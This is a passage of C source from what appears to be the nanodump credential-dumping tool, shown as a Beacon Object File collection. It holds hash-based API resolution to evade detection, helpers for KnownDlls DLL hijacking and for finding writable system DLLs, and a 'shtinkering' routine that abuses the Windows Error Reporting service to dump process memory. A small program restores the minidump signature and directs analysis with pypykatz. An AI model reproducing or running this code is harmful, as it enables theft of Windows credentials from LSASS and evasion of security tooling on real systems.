    status = RegOpenKeyExW(Key, SubKey, 0, KEY_SET_VALUE, &hKey);
    if (status != ERROR_SUCCESS)
    {
        function_failed("RegOpenKeyExW");
        goto cleanup;
    }

    status = RegSetValueExW(hKey, ValueName, 0, REG_SZ, (BYTE*)ValueData, dwDataSize);
    if (status != ERROR_SUCCESS)
    {
        function_failed("RegSetValueExW");
        goto cleanup;
    }

    ret_val = TRUE;

cleanup:
    if (hKey)
        RegCloseKey(hKey);

    if (ret_val)
    {
        DPRINT("Key: %ls | Value: %ls | Data: %ls", SubKey, ValueName, ValueData);
    }

    return ret_val;
}

BOOL get_registry_string_value(
    IN HKEY Key,
    IN LPCWSTR SubKey,
    IN LPCWSTR ValueName,
    OUT LPWSTR* ValueData)
{
    BOOL    ret_val        = FALSE;
    LSTATUS status         = ERROR_SUCCESS;
    HKEY    hKey           = NULL;
    DWORD   dwDataSize     = 0;
    LPWSTR  pwszStringData = NULL;

    RegOpenKeyExW_t    RegOpenKeyExW    = NULL;
    RegQueryValueExW_t RegQueryValueExW = NULL;
    RegCloseKey_t      RegCloseKey      = NULL;

    RegOpenKeyExW = get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        RegOpenKeyExW_SW2_HASH,
        0);
    if (!RegOpenKeyExW)
    {
        api_not_found("RegOpenKeyExW");
        goto cleanup;
    }

    RegQueryValueExW = get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        RegQueryValueExW_SW2_HASH,
        0);
    if (!RegQueryValueExW)
    {
        api_not_found("RegQueryValueExW");
        goto cleanup;
    }

    RegCloseKey = get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        RegCloseKey_SW2_HASH,
        0);
    if (!RegCloseKey)
    {
        api_not_found("RegCloseKey");
        goto cleanup;
    }

    status = RegOpenKeyExW(Key, SubKey, 0, KEY_QUERY_VALUE, &hKey);
    if (status != ERROR_SUCCESS)
    {
        function_failed("RegOpenKeyExW");
        goto cleanup;
    }

    status = RegQueryValueExW(hKey, ValueName, NULL, NULL, NULL, &dwDataSize);
    if (status != ERROR_SUCCESS)
    {
        function_failed("RegQueryValueExW");
        goto cleanup;
    }

    pwszStringData = intAlloc(dwDataSize);
    if (!pwszStringData)
    {
        malloc_failed();
        goto cleanup;
    }
    
    status = RegQueryValueExW(hKey, ValueName, NULL, NULL, (LPBYTE)pwszStringData, &dwDataSize);
    if (status != ERROR_SUCCESS)
    {
        function_failed("RegQueryValueExW");
        goto cleanup;
    }
    
    *ValueData = pwszStringData;
    ret_val = TRUE;

cleanup:
    if (!ret_val && pwszStringData) intFree(pwszStringData);
    if (hKey) RegCloseKey(hKey);

    if (ret_val)
    {
        DPRINT("Key: %ls | Value: %ls | Data: %ls", SubKey, ValueName, pwszStringData);
    }

    return ret_val;
}


BOOL generate_temp_path(
    OUT LPWSTR* Buffer)
{
    BOOL   ret_val        = FALSE;
    DWORD  dwBufferLength = MAX_PATH + 1;
    LPWSTR pwszTempPath   = NULL;
    DWORD  dwRet          = 0;
    UINT   uintRet        = 0;

    GetTempPathW_t     GetTempPathW     = NULL;
    GetTempFileNameW_t GetTempFileNameW = NULL;

    GetTempPathW = (GetTempPathW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        GetTempPathW_SW2_HASH,
        0);
    if (!GetTempPathW)
    {
        api_not_found("GetTempPathW");
        goto cleanup;
    }

    GetTempFileNameW = (GetTempFileNameW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        GetTempFileNameW_SW2_HASH,
        0);
    if (!GetTempFileNameW)
    {
        api_not_found("GetTempFileNameW");
        goto cleanup;
    }

    pwszTempPath = intAlloc(dwBufferLength * sizeof(WCHAR));
    if (!pwszTempPath)
    {
        malloc_failed()
        goto cleanup;
    }

    *Buffer = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!*Buffer)
        goto cleanup;

    dwRet = GetTempPathW(dwBufferLength, pwszTempPath);
    if (!dwRet)
    {
        function_failed("GetTempPathW");
        goto cleanup;
    }

    uintRet = GetTempFileNameW(pwszTempPath, L"", 0, *Buffer);
    if (!uintRet)
    {
        function_failed("GetTempFileNameW");
        goto cleanup;
    }

    ret_val = TRUE;

cleanup:
    safe_free((PVOID*)&pwszTempPath);
    if (!ret_val)
        safe_free((PVOID*)Buffer);

    if (ret_val)
    {
        DPRINT("Temp path: %ls", *Buffer);
    }

    return ret_val;
}

BOOL get_known_dlls_handle_address(
    IN PVOID* KnownDllDirectoryHandleAddr)
{
    BOOL                     ret_val                      = FALSE;
    HMODULE                  hNtdll                       = NULL;
    DWORD                    i                            = 0;
    DWORD                    dwSectionSize                = 0;
    DWORD                    dwIndex                      = 0;
    DWORD                    dwMaxSize                    = 0x1000;
    DWORD                    dwCurrentCode                = 0;
    LPVOID                   pLdrGetKnownDllSectionHandle = NULL;
    LPVOID                   pSectionAddress              = NULL;
    LPVOID                   pKnownDllsHandleAddr         = NULL;
    LPVOID                   pDataAddr                    = NULL;
    PIMAGE_DOS_HEADER        DosHeader                    = NULL;
    PIMAGE_NT_HEADERS        NtHeaders                    = NULL;
    PIMAGE_SECTION_HEADER    SectionHeader                = NULL;
    POBJECT_NAME_INFORMATION ObjectInfo                   = NULL;

    hNtdll = get_library_address(NTDLL_DLL, TRUE);

    pLdrGetKnownDllSectionHandle = get_function_address(
        hNtdll,
        LdrGetKnownDllSectionHandle_SW2_HASH,
        0);
    if (!pLdrGetKnownDllSectionHandle)
    {
        api_not_found("LdrGetKnownDllSectionHandle");
        goto cleanup;
    }

    DosHeader     = (PIMAGE_DOS_HEADER)hNtdll;
    NtHeaders     = RVA(PIMAGE_NT_HEADERS, hNtdll, DosHeader->e_lfanew);
    SectionHeader = (PIMAGE_SECTION_HEADER)((LPBYTE)&NtHeaders->OptionalHeader + NtHeaders->FileHeader.SizeOfOptionalHeader);

    for (i = 0; i < NtHeaders->FileHeader.NumberOfSections; i++)
    {
        if (!memcmp((char*)SectionHeader[i].Name, ".data", 6))
        {
            pSectionAddress = RVA(PULONG_PTR, hNtdll, SectionHeader[i].VirtualAddress);
            dwSectionSize = SectionHeader[i].Misc.VirtualSize;
            break;
        }
    }

    if (pSectionAddress == 0 || dwSectionSize == 0)
    {
        DPRINT_ERR("Failed to find the .text section of ntdll");
        goto cleanup;
    }

    ObjectInfo = intAlloc(1024);
    if (!ObjectInfo)
    {
        malloc_failed();
        goto cleanup;
    }

    dwIndex = 0;
    do
    {
        // If we reach the RET instruction, we found the end of the function.
        if (*(PWORD)pLdrGetKnownDllSectionHandle == 0xccc3 || dwIndex >= dwMaxSize)
            break;

        // 1. Read the 4 bytes at the current position => Potential RIP relative offset.
        // 2. Add the offset to the current position => Absolute address.
        // 3. Check if the calculated address is in the .data section.
        // 4. If so, we have a candidate, check if we can find the \KnownDlls handle at this address.
        dwCurrentCode = *(PDWORD)pLdrGetKnownDllSectionHandle;
        pDataAddr = (PBYTE)pLdrGetKnownDllSectionHandle + sizeof(dwCurrentCode) + dwCurrentCode;
        if ((ULONG_PTR)pDataAddr >= (ULONG_PTR)pSectionAddress && (ULONG_PTR)pDataAddr < (ULONG_PTR)((PBYTE)pSectionAddress + dwSectionSize))
        {
            if (NT_SUCCESS(NtQueryObject_(*(LPHANDLE)pDataAddr, ObjectNameInformation, ObjectInfo, MAX_PATH, NULL)))
            {
                if (ObjectInfo->Name.Buffer && !wcscmp(ObjectInfo->Name.Buffer, STR_KNOWNDLLS))
                {
                    pKnownDllsHandleAddr = pDataAddr;
                    break;
                }
            }
        }

        pLdrGetKnownDllSectionHandle = (PBYTE)pLdrGetKnownDllSectionHandle + 1;
        dwIndex += 1;

    } while (!pKnownDllsHandleAddr);

    if (!pKnownDllsHandleAddr)
        goto cleanup;

    *KnownDllDirectoryHandleAddr = pKnownDllsHandleAddr;
    ret_val = TRUE;

cleanup:
    safe_free((PVOID*)&ObjectInfo);

    return ret_val;
}

VOID safe_close_handle(
    IN PHANDLE Handle)
{
    if (Handle && *Handle && *Handle != INVALID_HANDLE_VALUE)
    {
        NtClose(*Handle);
        *Handle = NULL;
    }
}

BOOL find_writable_system_dll(
    IN DWORD MinSize,
    OUT LPWSTR* FilePath)
{
    BOOL             ret_val                  = FALSE;
    BOOL             bCurrentDirectoryChanged = FALSE;
    LPWSTR           pwszCurrentDirectory     = NULL;
    LPWSTR           pwszSystemDirectory      = NULL;
    LPWSTR           pwszFilePath             = NULL;
    WIN32_FIND_DATAW wfd                      = { 0 };
    HANDLE           hFind                    = NULL;
    HANDLE           hFile                    = NULL;
    DWORD            dwFileSize               = 0;

    FindFirstFileW_t       FindFirstFileW       = NULL;
    FindNextFileW_t        FindNextFileW        = NULL;
    FindClose_t            FindClose            = NULL;
    GetCurrentDirectoryW_t GetCurrentDirectoryW = NULL;
    GetSystemDirectoryW_t  GetSystemDirectoryW  = NULL;
    SetCurrentDirectoryW_t SetCurrentDirectoryW = NULL;
    CreateFileW_t          CreateFileW          = NULL;
    GetFileSize_t          GetFileSize          = NULL;

    FindFirstFileW = (FindFirstFileW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        FindFirstFileW_SW2_HASH,
        0);
    if (!FindFirstFileW)
    {
        api_not_found("FindFirstFileW");
        goto cleanup;
    }

    FindNextFileW = (FindNextFileW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        FindNextFileW_SW2_HASH,
        0);
    if (!FindNextFileW)
    {
        api_not_found("FindNextFileW");
        goto cleanup;
    }

    FindClose = (FindClose_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        FindClose_SW2_HASH,
        0);
    if (!FindClose)
    {
        api_not_found("FindClose");
        goto cleanup;
    }

    GetCurrentDirectoryW = (GetCurrentDirectoryW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        GetCurrentDirectoryW_SW2_HASH,
        0);
    if (!GetCurrentDirectoryW)
    {
        api_not_found("GetCurrentDirectoryW");
        goto cleanup;
    }

    SetCurrentDirectoryW = (SetCurrentDirectoryW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        SetCurrentDirectoryW_SW2_HASH,
        0);
    if (!SetCurrentDirectoryW)
    {
        api_not_found("SetCurrentDirectoryW");
        goto cleanup;
    }

    GetSystemDirectoryW = (GetSystemDirectoryW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        GetSystemDirectoryW_SW2_HASH,
        0);
    if (!GetSystemDirectoryW)
    {
        api_not_found("GetSystemDirectoryW");
        goto cleanup;
    }

    CreateFileW = (CreateFileW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        CreateFileW_SW2_HASH,
        0);
    if (!CreateFileW)
    {
        api_not_found("CreateFileW");
        goto cleanup;
    }

    GetFileSize = (GetFileSize_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        GetFileSize_SW2_HASH,
        0);
    if (!GetFileSize)
    {
        api_not_found("GetFileSize");
        goto cleanup;
    }

    // TODO: add syscalls

    pwszCurrentDirectory = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!pwszCurrentDirectory)
    {
        malloc_failed();
        goto cleanup;
    }

    pwszSystemDirectory = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!pwszSystemDirectory)
    {
        malloc_failed();
        goto cleanup;
    }

    pwszFilePath = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!pwszFilePath)
    {
        malloc_failed();
        goto cleanup;
    }

    GetCurrentDirectoryW(MAX_PATH, pwszCurrentDirectory);
    GetSystemDirectoryW(pwszSystemDirectory, MAX_PATH);
    SetCurrentDirectoryW(pwszSystemDirectory);
    
    bCurrentDirectoryChanged = TRUE;

    hFind = FindFirstFileW(L"*.dll", &wfd);
    if (hFind == INVALID_HANDLE_VALUE)
        goto cleanup;

    do
    {
        hFile = CreateFileW(wfd.cFileName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
        if (hFile== INVALID_HANDLE_VALUE)
            goto loopcleanup;

        dwFileSize = GetFileSize(hFile, NULL);

        if (dwFileSize == INVALID_FILE_SIZE || dwFileSize < MinSize)
            goto loopcleanup;

        *FilePath = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
        if (!*FilePath)
        {
            malloc_failed();
            goto loopcleanup;
        }

        swprintf_s(*FilePath, MAX_PATH, L"%ws\\%ws", pwszSystemDirectory, wfd.cFileName);
        ret_val = TRUE;

    loopcleanup:
        safe_close_handle(&hFile);

    } while (FindNextFileW(hFind, &wfd) && !ret_val);

cleanup:
    if (bCurrentDirectoryChanged) SetCurrentDirectoryW(pwszCurrentDirectory);
    if (hFind && hFind != INVALID_HANDLE_VALUE) FindClose(hFind);
    safe_free((PVOID*)&pwszCurrentDirectory);
    safe_free((PVOID*)&pwszSystemDirectory);
    safe_free((PVOID*)&pwszFilePath);

    if (ret_val)
    {
        DPRINT("File: %ls", *FilePath);
    }

    return ret_val;
}

BOOL get_hijacked_dll_name(
    OUT LPWSTR* HijackedDllName,
    OUT LPWSTR* HijackedDllSectionPath)
{
    BOOL ret_val = FALSE;

    *HijackedDllName = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!*HijackedDllName)
    {
        malloc_failed();
        goto cleanup;
    }

    *HijackedDllSectionPath = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!*HijackedDllSectionPath)
    {
        malloc_failed();
        goto cleanup;
    }

    swprintf_s(*HijackedDllName, MAX_PATH, L"%ws", STR_HIJACKED_DLL_NAME);
    swprintf_s(*HijackedDllSectionPath, MAX_PATH, L"\\%ws\\%ws", STR_BASENAMEDOBJECTS, *HijackedDllName);

    ret_val = TRUE;

cleanup:
    if (!ret_val && *HijackedDllName)
    {
        intFree(*HijackedDllName);
        *HijackedDllName = NULL;
    }
    if (!ret_val && *HijackedDllSectionPath)
    {
        intFree(*HijackedDllSectionPath);
        *HijackedDllSectionPath = NULL;
    }

    return ret_val;
}

BOOL get_windows_temp_directory(
    OUT LPWSTR* Path)
{
    BOOL   ret_val  = FALSE;
    LPWSTR pwszPath = NULL;
    UINT   ret      = 0;

    GetWindowsDirectoryW_t GetWindowsDirectoryW = NULL;

    GetWindowsDirectoryW = (GetWindowsDirectoryW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        GetWindowsDirectoryW_SW2_HASH,
        0);
    if (!GetWindowsDirectoryW)
    {
        api_not_found("GetWindowsDirectoryW");
        goto cleanup;
    }

    pwszPath = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!pwszPath)
    {
        malloc_failed();
        goto cleanup;
    }

    ret = GetWindowsDirectoryW(pwszPath, MAX_PATH);
    if (!ret)
    {
        function_failed("GetWindowsDirectoryW");
        goto cleanup;
    }

    swprintf_s(pwszPath, MAX_PATH, L"%ws\\Temp", pwszPath);

    *Path = pwszPath;
    ret_val = TRUE;

cleanup:
    if (!ret_val) safe_free((PVOID*)&pwszPath);

    return ret_val;
}

BOOL delete_directory(
    IN LPWSTR Path)
{
    BOOL             ret_val        = FALSE;
    BOOL             success        = FALSE;
    BOOL             bIsEmpty       = TRUE;
    HANDLE           hFind          = NULL;
    LPWSTR           pwszSearchPath = NULL;
    LPWSTR           pwszFullPath   = NULL;
    WIN32_FIND_DATAW FindData       = { 0 };

    FindFirstFileW_t   FindFirstFileW   = NULL;
    FindNextFileW_t    FindNextFileW    = NULL;
    FindClose_t        FindClose        = NULL;
    DeleteFileW_t      DeleteFileW      = NULL;
    RemoveDirectoryW_t RemoveDirectoryW = NULL;

    FindFirstFileW = (FindFirstFileW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        FindFirstFileW_SW2_HASH,
        0);
    if (!FindFirstFileW)
    {
        api_not_found("FindFirstFileW");
        goto cleanup;
    }

    FindNextFileW = (FindNextFileW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        FindNextFileW_SW2_HASH,
        0);
    if (!FindNextFileW)
    {
        api_not_found("FindNextFileW");
        goto cleanup;
    }

    FindClose = (FindClose_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        FindClose_SW2_HASH,
        0);
    if (!FindClose)
    {
        api_not_found("FindClose");
        goto cleanup;
    }

    DeleteFileW = (DeleteFileW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        DeleteFileW_SW2_HASH,
        0);
    if (!DeleteFileW)
    {
        api_not_found("DeleteFileW");
        goto cleanup;
    }

    RemoveDirectoryW = (RemoveDirectoryW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        RemoveDirectoryW_SW2_HASH,
        0);
    if (!RemoveDirectoryW)
    {
        api_not_found("RemoveDirectoryW");
        goto cleanup;
    }
    pwszFullPath = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!pwszFullPath)
    {
        malloc_failed();
        goto cleanup;
    }

    pwszSearchPath = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!pwszSearchPath)
    {
        malloc_failed();
        goto cleanup;
    }

    swprintf_s(pwszSearchPath, MAX_PATH, L"%ws\\*", Path);

    if ((hFind = FindFirstFileW(pwszSearchPath, &FindData)) == INVALID_HANDLE_VALUE)
    {
        if (GetLastError() == ERROR_FILE_NOT_FOUND)
            ret_val = TRUE;

        goto cleanup;
    }

    do
    {
        swprintf_s(pwszFullPath, MAX_PATH, L"%ws\\%ws", Path, FindData.cFileName);

        if (FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
        {
            if (!_wcsicmp(FindData.cFileName, L".") || !_wcsicmp(FindData.cFileName, L".."))
            {
                continue;
            }

            if (!delete_directory(pwszFullPath))
            {
                bIsEmpty = FALSE;
            }
        }
        else
        {
            if (!DeleteFileW(pwszFullPath))
            {
                DPRINT_ERR("Failed to delete file: %ls", pwszFullPath);
                bIsEmpty = FALSE;
            }
        }

    } while (FindNextFileW(hFind, &FindData));

    if (bIsEmpty)
    {
        success = RemoveDirectoryW(Path);
        if (!success)
            goto cleanup;
    }

    ret_val = TRUE;

cleanup:
    if (hFind && hFind != INVALID_HANDLE_VALUE) FindClose(hFind);
    safe_free((PVOID*)&pwszSearchPath);
    safe_free((PVOID*)&pwszFullPath);

    if (!ret_val)
    {
        DPRINT_ERR("Failed to delete directory: %ls", Path);
    }

    return ret_val;
}

BOOL find_module_section(
    IN HMODULE Module,
    IN LPCSTR SectionName,
    OUT PULONG_PTR Address,
    OUT LPDWORD Size)
{
    BOOL                  ret_val        = FALSE;
    DWORD                 dwBufferSize   = PAGE_SIZE;
    PIMAGE_NT_HEADERS     pNtHeaders     = NULL;
    PIMAGE_SECTION_HEADER pSectionHeader = NULL;
    DWORD                 i              = 0;
    PBYTE                 pBuffer        = NULL;

    RtlImageNtHeader_t RtlImageNtHeader = NULL;

    RtlImageNtHeader = (RtlImageNtHeader_t)(ULONG_PTR)get_function_address(
        get_library_address(NTDLL_DLL, TRUE),
        RtlImageNtHeader_SW2_HASH,
        0);
    if (!RtlImageNtHeader)
    {
        api_not_found("RtlImageNtHeader");
        goto cleanup;
    }

    pBuffer = intAlloc(dwBufferSize);
    if (!pBuffer)
    {
        malloc_failed();
        goto cleanup;
    }

    pNtHeaders = RtlImageNtHeader(Module);
    if (!pNtHeaders)
    {
        function_failed("RtlImageNtHeader");
        goto cleanup;
    }

    for (i = 0; i < pNtHeaders->FileHeader.NumberOfSections; i++)
    {
        pSectionHeader = (PIMAGE_SECTION_HEADER)((PBYTE)pNtHeaders + sizeof(*pNtHeaders) + i * sizeof(*pSectionHeader));

        if (!strcmp((char*)pSectionHeader->Name, SectionName))
        {
            *Address = (ULONG_PTR)((PBYTE)Module + pSectionHeader->VirtualAddress);
            *Size = pSectionHeader->SizeOfRawData;
            ret_val = TRUE;
            break;
        }
    }

cleanup:
    DPRINT("NT headers @ 0x%p | Address: 0x%p | Size: %ld | Result: %d", pNtHeaders, (PVOID)*Address, *Size, ret_val);

    safe_free((PVOID*)&pBuffer);

    return ret_val;
}

BOOL find_module_pattern(
    IN PBYTE Pattern,
    IN DWORD PatternLength,
    IN ULONG_PTR Address,
    IN DWORD Size,
    OUT PULONG_PTR PatternAddress)
{
    BOOL      ret_val        = FALSE;
    ULONG_PTR pModulePointer = 0;
    ULONG_PTR pModuleLimit   = 0;

    pModulePointer = Address;
    pModuleLimit = Address + Size - PatternLength;

    do
    {
        if (!memcmp(Pattern, (PVOID)pModulePointer, PatternLength))
        {
            *PatternAddress = pModulePointer;
            ret_val = TRUE;
            break;
        }

        pModulePointer++;

    } while ((pModulePointer < pModuleLimit) && !ret_val);

    return ret_val;
}

BOOL is_service_running(
    IN LPCWSTR ServiceName)
{
    DWORD dwServiceStatus;

    if (!get_service_status_by_name(ServiceName, &dwServiceStatus))
        return FALSE;

    return dwServiceStatus == SERVICE_RUNNING;
}


================================================
FILE: Creds-BOF/nanodump/source/restore_signature.c
================================================
#include <stdio.h>

int main(int argc, char* argv[])
{
    if (argc != 2)
    {
        fprintf(stderr, "usage: %s <input file>\n", argv[0]);
        return -1;
    }

    FILE* f = fopen(argv[1], "r+");
    if (!f)
    {
        fprintf(stderr, "Invalid input file: %s\n", argv[1]);
        return -1;
    }

    // valid signature
    unsigned char signature[] = { 0x4d, 0x44, 0x4d, 0x50, 0x93, 0xa7, 0x00, 0x00 };

    fseek(f, 0L, SEEK_SET);
    fwrite(signature, sizeof(signature), sizeof(unsigned char), f);

    fclose(f); f = NULL;

    printf("done, to analize the dump run:\npython3 -m pypykatz lsa minidump %s\n", argv[1]);

    return 0;
}


================================================
FILE: Creds-BOF/nanodump/source/shtinkering.c
================================================
#include "shtinkering.h"


BOOL cleanup_registry_key(
    IN HANDLE hRegistry)
{
    BOOL ret_val = FALSE;
    NTSTATUS status = STATUS_UNSUCCESSFUL;

    if (hRegistry)
    {
        status = NtDeleteKey(hRegistry);
        if (!NT_SUCCESS(status))
        {
            syscall_failed("NtDeleteKey", status);
            goto cleanup;
        }
    }

    ret_val = TRUE;

cleanup:
    return ret_val;
}

BOOL set_registry_key(
    OUT PHANDLE phRegistry)
{
    BOOL ret_val = FALSE;
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    UNICODE_STRING reg_key_name = { 0 };
    UNICODE_STRING reg_value_name = { 0 };
    OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
    DWORD DumpType = 0;

    if (!phRegistry)
        goto cleanup;

    reg_key_name.Buffer = SHTINKERING_KEY;
    reg_key_name.Length = 0xa0;
    reg_key_name.MaximumLength = 0xa2;

    // Creating the registry key
    InitializeObjectAttributes(&ObjectAttributes, &reg_key_name, OBJ_CASE_INSENSITIVE, NULL, NULL);

    status = NtCreateKey(
        phRegistry,
        KEY_ALL_ACCESS,
        &ObjectAttributes,
        0,
        NULL,
        REG_OPTION_VOLATILE,
        0);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtCreateKey", status);
        goto cleanup;
    }

    DPRINT("Registry key has been created : %ls", reg_key_name.Buffer);

    // set up registry key name
    reg_value_name.Buffer = L"DumpType";
    reg_value_name.Length = 0x10;
    reg_value_name.MaximumLength = 0x12;
    DumpType = LOCAL_DUMP;

    status = NtSetValueKey(
        *phRegistry,
        &reg_value_name,
        0,
        REG_DWORD,
        &DumpType,
        sizeof(DWORD));
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtSetValueKey", status);
        goto cleanup;
    }

    DPRINT("Sub key DumpType has been created");

    ret_val = TRUE;

cleanup:
    return ret_val;
}

BOOL wait_for_wersvc(VOID)
{
    BOOL ret_val = FALSE;
    HANDLE hEvent = NULL;
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    OBJECT_ATTRIBUTES objectAttributes = { 0 };
    UNICODE_STRING objectName = { 0 };

    objectName.Buffer = L"\\KernelObjects\\SystemErrorPortReady";
    objectName.Length = 0x46;
    objectName.MaximumLength = 0x48;

    objectAttributes.ObjectName = &objectName;
    objectAttributes.Length = sizeof(OBJECT_ATTRIBUTES);
    objectAttributes.RootDirectory = NULL;
    objectAttributes.Attributes = 0;
    objectAttributes.SecurityDescriptor = NULL;
    objectAttributes.SecurityQualityOfService = NULL;

    status = NtOpenEvent(
        &hEvent,
        EVENT_QUERY_STATE|SYNCHRONIZE,
        &objectAttributes);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtOpenEvent", status);
        goto cleanup;
    }

    status = NtWaitForSingleObject(
        hEvent,
        FALSE,
        NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtWaitForSingleObject", status);
        goto cleanup;
    }

    ret_val = TRUE;

cleanup:
    if (hEvent)
        NtClose(hEvent);

    return ret_val;
}

BOOL signal_start_wersvc(VOID)
{
    BOOL ret_val = FALSE;
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    PVOID NtUpdateWnfStateData_addr = NULL;
    EtwEventWriteNoRegistration_t EtwEventWriteNoRegistration = NULL;

    // find the address of NtUpdateWnfStateData dynamically
    NtUpdateWnfStateData_addr = get_function_address(
        get_library_address(NTDLL_DLL, TRUE),
        NtUpdateWnfStateData_SW2_HASH,
        0);

    if (NtUpdateWnfStateData_addr)
    {
        ULONG64 werWnfStateName = 0x41940B3AA3BC0875; // WNF_WER_SERVICE_START
        status = NtUpdateWnfStateData(
            &werWnfStateName,
            NULL,
            0,
            NULL,
            NULL,
            0,
            0);
        if (!NT_SUCCESS(status))
        {
            syscall_failed("NtUpdateWnfStateData", status);
            goto cleanup;
        }
    }
    else
    {
        // Alternative to WNF (before Win8 for example)
        EtwEventWriteNoRegistration = (EtwEventWriteNoRegistration_t)(ULONG_PTR)get_function_address(
            get_library_address(NTDLL_DLL, TRUE),
            EtwEventWriteNoRegistration_SW2_HASH,
            0);
        if (!EtwEventWriteNoRegistration)
        {
            api_not_found("EtwEventWriteNoRegistration");
            goto cleanup;
        }

        GUID feedbackServiceTriggerProviderGuid = { 0xe46eead8, 0xc54, 0x4489, {0x98, 0x98, 0x8f, 0xa7, 0x9d, 0x5, 0x9e, 0xe} };
        EVENT_DESCRIPTOR eventDescriptor = { 0 };
        memset(&eventDescriptor, 0, sizeof(EVENT_DESCRIPTOR));
        status = EtwEventWriteNoRegistration(
            &feedbackServiceTriggerProviderGuid,
            &eventDescriptor,
            0,
            NULL);
        if (!NT_SUCCESS(status))
        {
            function_failed("EtwEventWriteNoRegistration");
            goto cleanup;
        }
    }

    ret_val = TRUE;

cleanup:
    return ret_val;
}

BOOL send_message_to_wer_service(
    IN PVOID SendingMessage,
    OUT PVOID ReceivingMessage)
{
    BOOL ret_val = FALSE;
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    UNICODE_STRING alpcWerPort_ustr = { 0 };
    HANDLE hPort = NULL;
    OBJECT_ATTRIBUTES objectAttributes = { 0 };
    ALPC_PORT_ATTRIBUTES portAttributes = { 0 };
    SIZE_T bufLength = 0;

    status = signal_start_wersvc();
    if (!NT_SUCCESS(status))
        goto cleanup;

    status = wait_for_wersvc();
    if (!NT_SUCCESS(status))
        goto cleanup;

    alpcWerPort_ustr.Buffer = L"\\WindowsErrorReportingServicePort";
    alpcWerPort_ustr.Length = 0x42;
    alpcWerPort_ustr.MaximumLength = 0x44;

    objectAttributes.Length = sizeof(objectAttributes);
    objectAttributes.RootDirectory = NULL;
    objectAttributes.Attributes = 0;
    objectAttributes.ObjectName = NULL;
    objectAttributes.SecurityDescriptor = NULL;
    objectAttributes.SecurityQualityOfService = NULL;

    memset(&portAttributes, 0, sizeof(portAttributes));
    portAttributes.MaxMessageLength = sizeof(ReportExceptionWerAlpcMessage);

    status = NtAlpcConnectPort(
        &hPort,
        &alpcWerPort_ustr,
        &objectAttributes,
        &portAttributes,
        ALPC_MSGFLG_SYNC_REQUEST,
        NULL,
        NULL,
        NULL,
        NULL,
        NULL,
        NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtAlpcConnectPort", status);
        goto cleanup;
    }

    bufLength = sizeof(ReportExceptionWerAlpcMessage);
    status = NtAlpcSendWaitReceivePort(
        hPort,
        ALPC_MSGFLG_SYNC_REQUEST,
        (PPORT_MESSAGE)SendingMessage,
        NULL,
        (PPORT_MESSAGE)ReceivingMessage,
        &bufLength,
        NULL,
        NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtAlpcSendWaitReceivePort", status);
        goto cleanup;
    }

    // Check that the status from the call and in the received message indicate success
    if (NT_SUCCESS(status) && STATUS_TIMEOUT != status)
    {
        if (!NT_SUCCESS(((PReportExceptionWerAlpcMessage)ReceivingMessage)->NtStatusErrorCode))
        {
            PRINT_ERR("the Wer service responded with an error");
            goto cleanup;
        }
    }
    else
    {
        syscall_failed("NtAlpcSendWaitReceivePort", status);
        goto cleanup;
    }

    ret_val = TRUE;

cleanup:
    if (hPort)
        NtClose(hPort);

    return ret_val;
}

BOOL find_valid_thread_id(
    IN DWORD process_id,
    OUT PDWORD pthread_id)
{
    BOOL ret_val = FALSE;
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    HANDLE hProcess = NULL;
    HANDLE hThread = NULL;
    *pthread_id = 0;

    /*
     * while interacting with other processes is bad for opsec,
     * the permissions are harmless and most likely whitelisted
     */
    hProcess = get_process_handle(
        process_id,
        PROCESS_QUERY_INFORMATION,
        FALSE,
        0);
    if (!hProcess)
    {
